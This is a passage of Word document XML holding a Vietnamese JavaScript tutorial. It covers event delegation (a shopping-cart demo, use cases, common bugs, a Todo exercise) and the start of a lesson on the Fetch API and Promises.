    <w:p w14:paraId="3DDD8324" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    btnAddProduct.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCBF23" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const randomId = 'prod-' + Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D915B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const newRow = document.createElement('tr');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE42C6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      newRow.dataset.id = randomId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1554835E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      newRow.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66407407" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td&gt;Tai nghe chống ồn mới&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B02A4D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td class="qty-val"&gt;1&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53AC2E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01433F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-qty" data-action="increase"&gt;+&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D75F8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-qty" data-action="decrease"&gt;-&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2379C4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          &lt;button type="button" class="btn-delete" data-action="delete"&gt;Xóa&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0349C5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31BDD0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      `;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BDE0F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Phần tử này vừa sinh ra, CHƯA HỀ được gắn listener nào, nhưng vẫn hoạt động hoàn hảo nhờ Event Delegation!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392A4EA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      cartBody.appendChild(newRow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD7914" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAC677" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C80AC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17311E3A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52616572" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Ứng dụng trong thực tế (Real-world use case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DA01A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 1: Tối ưu Bộ nhớ cho Bảng Dữ liệu Hàng nghìn Dòng (Data Grid):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773EF8B" w14:textId="57B92C19" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Trong một hệ thống CRM quản lý </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>5,000</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> khách hàng, mỗi dòng có các nút: "Xem", "Sửa", "Xóa". Nếu gắn event listener thủ công cho từng nút, trình duyệt sẽ phải lưu trữ hơn </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>15,000</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> đối tượng hàm trong RAM, làm ứng dụng bị chậm rõ rệt trên thiết bị di động. Bằng cách dùng Event Delegation đặt tại thẻ &lt;tbody&gt;, số lượng listener trong bộ nhớ giảm xuống còn đúng </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t>, giúp trang mượt mà tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B98921" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 2: Xử lý Phần tử Sinh ra Động qua AJAX / Infinite Scroll:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE8478" w14:textId="5469FF16" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Khi xây dựng bảng tin mạng xã hội (tương tự Facebook/Twitter), người dùng cuộn xuống để nạp thêm các bài đăng mới bằng API. Nếu không dùng Event Delegation, mỗi khi nạp thêm </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>10</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> bài đăng mới, lập trình viên sẽ phải chạy vòng lặp tìm các nút Like/Share vừa nạp để gắn event (rất dễ sinh ra lỗi gắn trùng lặp sự kiện). Với Event Delegation, container cha quản lý toàn bộ các bài đăng sinh ra trong tương lai mà không cần viết thêm dòng code gắn sự kiện nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC9C07" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Lỗi thường gặp &amp; cách debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA875F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 1: Nhầm lẫn giữa event.target và event.currentTarget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7FE4A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Bạn viết nút bấm có chứa icon bên trong: &lt;button&gt;&lt;svg&gt;...&lt;/svg&gt; &lt;span&gt;Xóa&lt;/span&gt;&lt;/button&gt;. Khi người dùng click trúng hình icon SVG, event.target trả về chính thẻ &lt;svg&gt; hoặc &lt;path&gt;, khiến câu lệnh event.target.dataset.action trả về undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1307E4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Luôn sử dụng phương thức event.target.closest('selector') (ví dụ event.target.closest('button')) để leo ngược lên tìm đúng thẻ cha mang ngữ nghĩa mong muốn, hoặc phân biệt rõ event.currentTarget là phần tử đang trực tiếp đứng ra lắng nghe sự kiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2299B5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 2: Lạm dụng event.stopPropagation() vô tội vạ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F9376" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Để giải quyết một lỗi nổi bọt cục bộ, lập trình viên gõ bừa event.stopPropagation(). Hậu quả khôn lường là toàn bộ các công cụ thống kê theo dõi hành vi người dùng (như Google Analytics, Mixpanel), hoặc các thư viện menu dropdown đóng khi click ra ngoài (click outside to close) trên toàn bộ trang web bị tê liệt hoàn toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379067C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Hạn chế tối đa dùng stopPropagation(). Thay vào đó, hãy kiểm tra ngữ cảnh tại đích hoặc tại cha bằng các điều kiện logic để quyết định có chạy mã hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA9D1D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 3: Gắn lặp lại listener bên trong một hàm khác (Listener Duplication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A21C1" w14:textId="1DAB7493" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Mỗi lần mở hộp thoại Modal, bạn lại gọi btnConfirm.addEventListener(...). Kết quả là đến lần mở thứ 3, khi nhấn nút Xác nhận, hành động thanh toán bị gửi đi </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>3</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> lần liên tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D8FC7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Đưa lệnh addEventListener ra phạm vi ngoài cùng, hoặc sử dụng tùy chọn { once: true } để trình duyệt tự động gỡ bỏ listener sau lần kích hoạt đầu tiên, hoặc gọi hàm removeEventListener khi đóng modal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A194A5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bài tập thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD03F22" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề bài:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Xây dựng một danh sách công việc (Todo List) có tính năng: Thêm việc mới, Đánh dấu hoàn thành (gạch ngang dòng chữ), và Xóa việc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312AFE1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu chí nghiệm thu (Acceptance Criteria):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF20AE0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Chỉ được phép sử dụng DUY NHẤT một lời gọi addEventListener('click') cho toàn bộ danh sách &lt;ul&gt; (bắt buộc dùng Event Delegation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36981FCC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Xử lý chính xác trường hợp click vào icon nằm bên trong nút xóa bằng event.target.closest().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0508A895" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi bấm vào chính giữa dòng chữ của task thì chuyển đổi trạng thái hoàn thành (classList.toggle('done')), bấm vào nút xóa thì loại bỏ task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38381CF1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bài 3: Fetch API &amp; Promise cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB27F6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Khái niệm cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8DD1D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lập trình Bất đồng bộ (Asynchronous) &amp; Đối tượng Promise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274765B9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Môi trường JavaScript là đơn luồng (Single-threaded) — nghĩa là nó chỉ có thể thực thi một lệnh duy nhất tại một thời điểm trên Call Stack. Để các tác vụ tốn thời gian (như gửi yêu cầu qua mạng internet kéo dài vài trăm mili-giây) không làm "đóng băng" giao diện người dùng, trình duyệt cung cấp cơ chế bất đồng bộ. Một </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> là một đối tượng đại diện cho kết quả cuối cùng (thành công hoặc thất bại) của một tác vụ bất đồng bộ sẽ được trả về trong tương lai. Promise luôn tồn tại ở 1 trong 3 trạng thái độc quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791628EB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>pending: Trạng thái ban đầu, tác vụ đang chờ xử lý, chưa hoàn thành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CC0D8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>fulfilled: Tác vụ đã hoàn thành thành công, mang theo giá trị kết quả (value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF19E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>rejected: Tác vụ thất bại, mang theo một lý do lỗi (error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C08670" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fetch API — Chuẩn mực Giao tiếp Mạng Hiện đại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F224EB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>fetch() là một hàm toàn cục (Global Web API) trả về một Promise, thay thế hoàn toàn cho đối tượng cồng kềnh thời kỳ đầu XMLHttpRequest. Cú pháp cơ bản: fetch(url, [options]). Hàm này gửi một HTTP Request đến máy chủ backend và phân giải kết quả bất đồng bộ mà không cần tải lại trang (nền tảng của kỹ thuật AJAX và Single Page Applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7F27FC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuỗi Xử lý Promise (Promise Chaining):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752DB580" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Promise cung cấp các phương thức để xử lý luồng dữ liệu tuần tự:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598F039" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>.then(onFulfilled): Nhận dữ liệu khi Promise chuyển sang trạng thái fulfilled. Nếu bên trong .then trả về một Promise khác (như response.json()), ta có thể nối tiếp một .then thứ hai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744BD50" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>.catch(onRejected): Đánh chặn và xử lý mọi lỗi xảy ra ở bất kỳ mắt xích nào phía trên trong chuỗi Promise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F4A40" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>.finally(onFinally): Luôn luôn được thực thi ở bước cuối cùng dù tác vụ thành công hay thất bại (rất lý tưởng để tắt biểu tượng tải trang - hide loading spinner).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12706F31" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cơ chế hoạt động chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E665AAD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Chu trình xử lý hai giai đoạn của fetch() và đường đi của Promise trong Event Loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B1A1AC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initiation &amp; Network Delegation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
